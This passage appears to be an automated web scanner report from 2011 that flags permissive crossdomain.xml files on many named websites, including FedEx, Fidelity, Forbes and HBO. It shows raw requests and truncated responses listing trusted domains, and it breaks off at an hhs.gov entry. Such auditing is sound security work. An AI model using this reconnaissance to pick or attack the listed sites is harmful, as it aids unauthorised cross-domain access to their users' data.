HTTP/1.0 200 OK Server: LiteSpeed Date: Sat, 02 Apr 2011 13:42:29 GMT Connection: close Accept-Ranges: bytes ETag: "111-4d13ae92-0" Last-Modified: Thu, 23 Dec 2010 20:18:26 GMT Content-Type: application/xml Cache-Control: max-age=604800 Expires: Sat, 09 Apr 2011 13:42:20 GMT Content-Length: 273 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.fanfiction.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fanpop.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fanpop.com |
HTTP/1.1 200 OK Server: nginx/0.7.64 Date: Sat, 02 Apr 2011 13:32:52 GMT Content-Type: text/xml Content-Length: 212 Last-Modified: Mon, 08 Nov 2010 23:28:28 GMT Connection: close Expires: Sat, 02 Apr 2011 13:32:53 GMT Cache-Control: max-age=1 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.meebo.com" /> </cross-dom ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fantage.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fantage.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:19:52 GMT Server: Apache Last-Modified: Tue, 05 Oct 2010 23:53:59 GMT ETag: "a7051b-147-491e75fe293c0 Accept-Ranges: bytes Content-Length: 327 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.fantage.com" /> <allow-access-from domain="fantage-1" /> <allow-access-from domain="fantage-2" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fastcompany |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fastcompany.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:54:53 GMT Server: VoxCAST X-Powered-By: PHP/5.2.4 X-Drupal-Cache: MISS Expires: Sat, 02 Apr 2011 14:15:05 GMT Last-Modified: Sat, 02 Apr 2011 13:55:05 GMT Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0 ETag: "1301752505" Content-Length: 273 Vary: Accept-Encoding X-Served-By: daa-www010 Content-Type: text/xml X-Cache: MISS from VoxCAST Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.fastcompany <allow-access-from domain="*.www.fastcompany.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fedex.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fedex.com |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 02 Apr 2011 13:24:33 GMT Content-length: 543 Content-type: text/xml X-ua-compatible: IE=EmulateIE7 Set-cookie: fdx_cbid=22185494081 Last-modified: Fri, 29 Jan 2010 15:21:31 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.fedex.com"/> ...[SNIP]... <allow-access-from domain="*http://www.myexperi ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fidelity.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fidelity.com |
HTTP/1.0 200 OK Server: FWS/7.0 P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" X-ua-compatible: IE=EmulateIE7 Content-Type: text/xml Last-Modified: Mon, 30 Jul 2007 18:35:02 GMT Content-Length: 256 ETag: "100-46ae2f56" Accept-Ranges: bytes Date: Sat, 02 Apr 2011 13:32:33 GMT Connection: close Set-Cookie: MC=psTVCRkhsKDdSYTuQ Set-Cookie: v1st=26BDA52822D0120A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fidelity.com <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.fidelity.com" /> <allow-access-from domain="*.fmr.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.finishline.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.finishline.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 29 Apr 2009 18:02:28 GMT ETag: "4063-111-61eaf500" Accept-Ranges: bytes Content-Length: 273 Content-Type: text/xml Expires: Sat, 02 Apr 2011 14:03:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 14:03:05 GMT Connection: close Set-Cookie: TLTSID=3AC9FCC45D321 Set-Cookie: TLTUID=3AC9FCC45D321 Set-Cookie: BIGipServerwww07 Set-Cookie: ClientID=5016caeb673 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.blastradius.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.food.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.food.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 03 Mar 2011 11:48:55 GMT Accept-Ranges: bytes Content-Length: 272 X-Cnection: close Content-Type: text/xml Expires: Sat, 02 Apr 2011 13:42:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:42:53 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.recipezaar.com"/> <allow-access-from domain="*.scrippsnetworks.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.foodnetwork |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.foodnetwork.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Tue, 10 Nov 2009 12:28:07 GMT Content-Type: application/xml Date: Sat, 02 Apr 2011 13:24:48 GMT Content-Length: 1084 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain < ...[SNIP]... <allow-access-from domain="*.hgtvpro.com"/> <allow-access-from domain="*.hgtv.com"/> <allow-access-from domain="*.diynetwork.com"/> <allow-access-from domain="*.diynet.com"/> <allow-access-from domain="*.fineliving.com"/> <allow-access-from domain="*.food.com"/> <allow-access-from domain="*.foodnetwork.com"/> <allow-access-from domain="*.gactv.com"/> <allow-access-from domain="*.scrippsonline.com"/> <allow-access-from domain="*.hottrends2005.com"/> <allow-access-from domain="*.hottrends2006.com"/> <allow-access-from domain="*.scrippsnetworks.com"/> <allow-access-from domain="*.scripps.com"/> <allow-access-from domain="*.chumby.com"/> <allow-access-from domain="*.videomment.com"/> <allow-access-from domain="*.doubleclick.net"/> <allow-access-from domain="*.videomerce.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.forbes.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.forbes.com |
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 13:31:03 GMT Server: Apache/1.3.26 Vary: Accept-Encoding,User Last-Modified: Tue, 22 Dec 2009 15:13:03 GMT ETag: "11033e1-4fb-4b30e1ff" Accept-Ranges: bytes Content-Length: 1275 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="app.scanscout.com" /> <allow-access-from domain="static.scanscout.com" /> ...[SNIP]... <allow-access-from domain="images.forbes.com" /> <allow-access-from domain="rss.forbes.com" /> <allow-access-from domain="video.forbes.com" /> <allow-access-from domain="*.postapp.com" /> <allow-access-from domain="*.widgetbox.com" /> <allow-access-from domain="*.widgetserver.com" /> <allow-access-from domain="*.redcated" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="rmd.redcated" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.freelotto.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.freelotto.com |
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 13:40:28 GMT Server: Apache Last-Modified: Thu, 07 Oct 2010 21:25:36 GMT ETag: "2947c-fb-4920d88e85400" Accept-Ranges: bytes Content-Length: 251 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.freelotto.com" /> <allow-access-from domain="i.pinid.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ft.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ft.com |
HTTP/1.1 200 OK ETag: "51d-4ba8ec18" P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC" Accept-Ranges: bytes Content-Length: 1309 Date: Sat, 02 Apr 2011 13:39:27 GMT Connection: close Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT Server: Apache/1.3.37 Content-Type: text/xml Keep-Alive: timeout=1, max=120 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.ft.com" secure="true"/> <allow-access-from domain="*.doubleclick.net" secure="true"/> <allow-access-from domain="*.2mdn.net" secure="true"/> <allow-access-from domain="*.dartmotif.net" secure="true"/> <allow-access-from domain="*.tangozebra.com" secure="true"/> <allow-access-from domain="*.euronews.net" secure="true"/> <allow-access-from domain="*.google.com" secure="true"/> <allow-access-from domain="*.gstatic.com" secure="true"/> <allow-access-from domain="*.doubleclick.net" secure="false"/> <allow-access-from domain="*.2mdn.net" secure="false"/> <allow-access-from domain="*.dartmotif.net" secure="false"/> <allow-access-from domain="*.doubleclick.net" secure="true"/> <allow-access-from domain="*.doubleclick.com" secure="true"/> <allow-access-from domain="*.doubleclick.com" secure="false"/> <allow-access-from domain="*.2mdn.net" secure="true"/> <allow-access-from domain="*.dartmotif.net" secure="true"/> <allow-access-from domain="*.googlesyndication.com" secure="true"/> <allow-access-from domain="*.brightcove.com" secure="true"/> <allow-access-from domain="*.google-analytics.com" secure="true"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ftd.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ftd.com |
HTTP/1.1 200 OK Server: Apache Set-Cookie: TLTSID=8B1BF5185D2F1 Set-Cookie: TLTUID=8B1BF5185D2F1 Vary: Accept-Encoding X-Accelerator-Vary: Accept-Encoding Last-Modified: Thu, 02 Dec 2010 02:32:40 GMT ETag: "136-4cf70548" Content-Type: text/xml Content-Length: 310 Date: Sat, 02 Apr 2011 13:45:59 GMT X-Varnish: 1841590900 Age: 0 Via: 1.1 varnish Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.akamai.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.ftd.com" /> <allow-access-from domain="*.ftdimg.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.funbrain.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.funbrain.com |
HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: max-age=3600 Content-Type: text/xml Date: Sat, 02 Apr 2011 13:27:16 GMT ETag: "d4-44e3a23690f00" Expires: Sat, 02 Apr 2011 14:27:16 GMT Last-Modified: Tue, 27 May 2008 18:05:16 GMT Server: Apache Set-Cookie: Apache=10.243.58.175 Content-Length: 212 Connection: Close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.funbrain.com" /> </cross-dom ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.funnyordie.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.funnyordie.com |
HTTP/1.0 200 OK Server: nginx Content-Type: text/xml Last-Modified: Tue, 06 Apr 2010 22:16:03 GMT X-Varnish: 2107042366 2107041865 Content-Length: 2171 X-Varnish: 2004702214 2004701541 Served-by: 278029-prodweb2 Date: Sat, 02 Apr 2011 13:34:15 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.widgetbox.com" /> <allow-access-from domain="*.widgetserver.com" /> <allow-access-from domain="*.spinlets.com" /> <allow-access-from domain="*.ordienetworks.com" /> <allow-access-from domain="*.ordienetworks-staging <allow-access-from domain="*.ordienetworks <allow-access-from domain="funnyordie.com" /> <allow-access-from domain="*.funnyordie.com" /> <allow-access-from domain="*.funnyordie-staging.com" /> <allow-access-from domain="*.funnyordie-integration <allow-access-from domain="*.funnyordie.com.local" /> <allow-access-from domain="shredordie.com" /> <allow-access-from domain="*.shredordie.com" /> <allow-access-from domain="*.shredordie-staging.com" /> <allow-access-from domain="*.shredordie-integration <allow-access-from domain="*.shredordie.com.local" /> <allow-access-from domain="eatdrinkordie.com" /> <allow-access-from domain="*.eatdrinkordie.com" /> <allow-access-from domain="*.eatdrinkordie-staging <allow-access-from domain="*.eatdrinkordie <allow-access-from domain="*.eatdrinkordie.com.local" /> <allow-access-from domain="pwnordie.com" /> <allow-access-from domain="*.pwnordie.com" /> <allow-access-from domain="*.pwnordie-staging.com" /> <allow-access-from domain="*.pwnordie-integration <allow-access-from domain="*.pwnordie.com.local" /> <allow-access-from domain="morraderir.com.br" /> <allow-access-from domain="*.morraderir.com.br" /> <allow-access-from domain="*.morraderir-staging.com <allow-access-from domain="*.morraderir-integration <allow-access-from domain="*.morraderir.com.br.local" /> ...[SNIP]... <allow-access-from domain="*.funnyordie.co.uk" /> <allow-access-from domain="*.funnyordie-staging.co <allow-access-from domain="*.funnyordie-integration <allow-access-from domain="*.funnyordie.co.uk.local" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.gaiaonline.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gaiaonline.com |
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 13:46:14 GMT Server: Apache Last-Modified: Fri, 25 Mar 2011 18:18:54 GMT ETag: "308c1ca-4df-a065bf80" Accept-Ranges: bytes Content-Length: 1247 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?><cross ...[SNIP]... <allow-access-from domain="66.147.214.164" to-ports="8080"/><allow ...[SNIP]... <allow-access-from domain="*.kongregatestage.com" to-ports="8080"/><allow ...[SNIP]... <allow-access-from domain="*.gworld.com" to-ports="8080" secure="false"/> ...[SNIP]... <allow-access-from domain="*.omgpop.com" to-ports="8080"/><allow ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.gamespot.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gamespot.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:26:00 GMT Server: Apache Last-Modified: Wed, 06 Feb 2008 01:04:07 GMT ETag: "c4a6ab-1cc-44572ef1bafc0 Accept-Ranges: bytes Content-Length: 460 Keep-Alive: timeout=300, max=1000 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.gamespot.com" /> <allow-access-from domain="image.com.com" /> <allow-access-from domain="img.gamespot.com" /> <allow-access-from domain="i.i.com.com" /> <allow-access-from domain="dw.com.com" /> <allow-access-from domain="cnet.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.gamestop.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gamestop.com |
HTTP/1.0 200 OK Content-Type: text/xml Content-Location: http://www.gamestop.com Last-Modified: Thu, 31 Mar 2011 16:05:37 GMT Accept-Ranges: bytes ETag: "4fb75679bdefcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 725 Date: Sat, 02 Apr 2011 13:33:18 GMT Connection: close ...<cross-domain-policy> <allow-access-from domain="*.gamestop.com" secure="false" /> <allow-access-from domain="*.gamestop.ca" secure="false" /> <allow-access-from domain="*.ebgames.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.brightcove.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.gamevance.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gamevance.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:53:26 GMT Server: Apache Last-Modified: Fri, 23 Jul 2010 08:31:14 GMT ETag: "38025d-1a2-48c09db9df880 Accept-Ranges: bytes Content-Length: 418 Cache-Control: max-age=18000 Expires: Sat, 02 Apr 2011 18:53:26 GMT Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.gv.facdn.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.facebook.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.gap.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gap.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"1350-1299723512000" Last-Modified: Thu, 10 Mar 2011 02:18:32 GMT Content-Type: application/xml Content-Length: 1350 Date: Sat, 02 Apr 2011 13:31:28 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Cross Domain Entry Descriptions: .gidapps.com: [added 6.40] U ...[SNIP]... <allow-access-from domain="*.gidapps.com"/> ...[SNIP]... <allow-access-from domain="*.assets-gap.com"/> ...[SNIP]... <allow-access-from domain="*.assets-gid.com"/> ...[SNIP]... <allow-access-from domain="*.gap1969.com"/> ...[SNIP]... <allow-access-from domain="akqasfht.vo.llnwd.net"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.gather.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gather.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:33:05 GMT Server: Apache/2.2.3 (Unix) mod_jk/1.2.28 Last-Modified: Tue, 01 Mar 2011 17:46:40 GMT ETag: "2f82e6-163-49d6f60ee4000 Accept-Ranges: bytes Content-Length: 355 Keep-Alive: timeout=5, max=100 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.quantserve.com"/> <allow-access-from domain="*.gather.com"/> <allow-access-from domain="*.aetna.com"/> <allow-access-from domain="*.intelihealth.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.geico.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.geico.com |
HTTP/1.0 200 OK Server: Apache Content-Type: application/xml; charset=UTF-8 Expires: Sat, 02 Apr 2011 13:35:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:35:16 GMT Content-Length: 357 Connection: close Set-Cookie: SaneID=ED8637E93A1DC1F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.geico.com <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.geico.com" /> <allow-access-from domain="geico.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.gifts.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gifts.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:26:31 GMT Server: Apache Set-Cookie: JSESSIONID=39A4FA7D4 Content-Language: en-US Content-Length: 227 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO Set-Cookie: SERVERID=web01; path=/ Cache-control: private <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.gifts.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.godaddy.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.godaddy.com |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sat, 02 Apr 2011 12:39:00 GMT Connection: close Content-Length: 150 <?xml version="1.0"?><cross |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.goodreads.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.goodreads.com |
HTTP/1.1 200 OK Server: nginx/0.8.52 Date: Sat, 02 Apr 2011 13:41:28 GMT Content-Type: text/xml Content-Length: 307 Last-Modified: Thu, 31 Mar 2011 23:27:03 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!-- http://www.adobe.com <cross-domain-policy> <allow-access-from domain="*.polaritylabs.com"/> <allow-access-from domain="polaritylabs.com"/> <allow-access-from domain="*.goodreads.com"/> <allow-access-from domain="goodreads.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.guardian.co.uk |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.guardian.co.uk |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:31:59 GMT Server: Apache Set-Cookie: GU_MU=VFpjbFR3cjZERT Set-Cookie: GU_LOCATION=dXNhOjU6 Last-Modified: Thu, 01 Apr 2010 16:14:58 GMT Accept-Ranges: bytes Content-Length: 1353 Vary: Accept-Encoding,User Cache-Control: max-age=86400 Expires: Sun, 03 Apr 2011 13:31:59 GMT X-GU-httpd: 05 P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC" Connection: close Content-Type: text/xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <!-- why are we doing this? See here: ht ...[SNIP]... <allow-access-from domain="*.bs.preview.serving-sys <allow-access-from domain="199.106.209.225"/> <allow-access-from domain="*.ds.serving-sys.com"/> <allow-access-from domain="199.106.209.197"/> <allow-access-from domain="*.bs.serving-sys.com"/> <allow-access-from domain="80.252.91.41"/> <allow-access-from domain="*.eyeblasterwiz.com"/> <allow-access-from domain="199.106.209.196"/> <allow-access-from domain="*.ebsearch.eyeblasterwiz <allow-access-from domain="62.249.238.93"/> <allow-access-from domain="*.serving-sys.com"/> <allow-access-from domain="web2.dreamleague.co.uk"/> <allow-access-from domain="fantasyfootball.guardian <allow-access-from domain="*.jumpmediagroup.com"/> <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="adimage.guardian.co.uk"/> <allow-access-from domain="static.guim.co.uk"/> <allow-access-from domain="*.gnl" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hallmark.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hallmark.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Fri, 25 Mar 2011 07:08:26 GMT Accept-Ranges: bytes ETag: "88bea06fbbeacb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WEBHOST: CW128 Content-Length: 535 Cache-Control: no-cache Date: Sat, 02 Apr 2011 14:14:54 GMT Connection: close <cross-domain-policy> <allow-access-from domain="www.hallmark.com" <allow-access-from domain="*.hmkb2c.com"/> <allow-access-from domain="*.hallmark.com"/> <allow-access-from domain="digitalassets.hallmark <allow-access-from domain="digitaltransfer.hallmark <allow-access-from domain="*.hmkdev.com"/> <allow-access-from domain="*.alvenda.com"/> <allow-access-from domain="*.alvenda.net"/> <allow-access-from domain="*.akamai.net"/> <allow-access-from domain="67.199.75.155"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hbo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hbo.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:15:40 GMT Server: Apache Last-Modified: Wed, 26 Jan 2011 20:20:12 GMT ETag: "6a0-41b-49ac58f677700" Accept-Ranges: bytes Content-Length: 1051 Cache-Control: max-age=60 Expires: Sat, 02 Apr 2011 14:16:40 GMT g: u Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="hbo.com" /> <allow-access-from domain="*.hbo.com" /> <allow-access-from domain="*.cdn.hbo.com" /> <allow-access-from domain="*.homebox.com" /> <allow-access-from domain="*.homeboxoffice.com" /> <allow-access-from domain="localhost" /> <allow-access-from domain="127.0.0.1" /> <allow-access-from domain="*.sprodhbo.homebox.com" /> <allow-access-from domain="myspacecdn.com" /> <allow-access-from domain="*.myspacecdn.com" /> <allow-access-from domain="*.myspace.com" /> <allow-access-from domain="myspace.com" /> <allow-access-from domain="*.gmodules.com" /> <allow-access-from domain="gmodules.com" /> <allow-access-from domain="farm.sproutbuilder.com"/> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.healthcentral |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.healthcentral.com |
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CUR CONi OUR DELi SAMi OTRi STP STA" X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Accept-Ranges: bytes Last-Modified: Wed, 14 Oct 2009 16:46:43 GMT ETag: "1CA4CEDE8CA1B80 Content-Type: text/xml Content-Length: 362 Cache-Control: public, max-age=1555 Expires: Sat, 02 Apr 2011 14:09:52 GMT Date: Sat, 02 Apr 2011 13:43:57 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.washingtonpost.com" /> <allow-access-from domain="*.choicemedia.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.healthcentral.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hgtv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hgtv.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Thu, 15 Jul 2010 03:51:40 GMT Content-Type: application/xml Date: Sat, 02 Apr 2011 13:45:24 GMT Content-Length: 1200 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.hgtvpro.com"/> <allow-access-from domain="*.hgtv.com"/> <allow-access-from domain="*.diynetwork.com"/> <allow-access-from domain="*.diynet.com"/> <allow-access-from domain="*.fineliving.com"/> <allow-access-from domain="*.food.com"/> <allow-access-from domain="*.foodnetwork.com"/> <allow-access-from domain="*.gactv.com"/> <allow-access-from domain="*.ecologue.com"/> <allow-access-from domain="*.scripps.com"/> <allow-access-from domain="*.scrippsonline.com"/> <allow-access-from domain="*.hottrends2005.com"/> <allow-access-from domain="*.hottrends2006.com"/> <allow-access-from domain="*.scrippsnetworks.com"/> <allow-access-from domain="72.3.226.28" /> <allow-access-from domain="64.225.232.166" /> <allow-access-from domain="*.videomment.com" /> <allow-access-from domain="*.widgets.isg-marketing <allow-access-from domain="*.videomerce.com"/> <allow-access-from domain="*.5Min.com"/> <allow-access-from domain="*.sndimg.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hhs.gov |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hhs.gov |
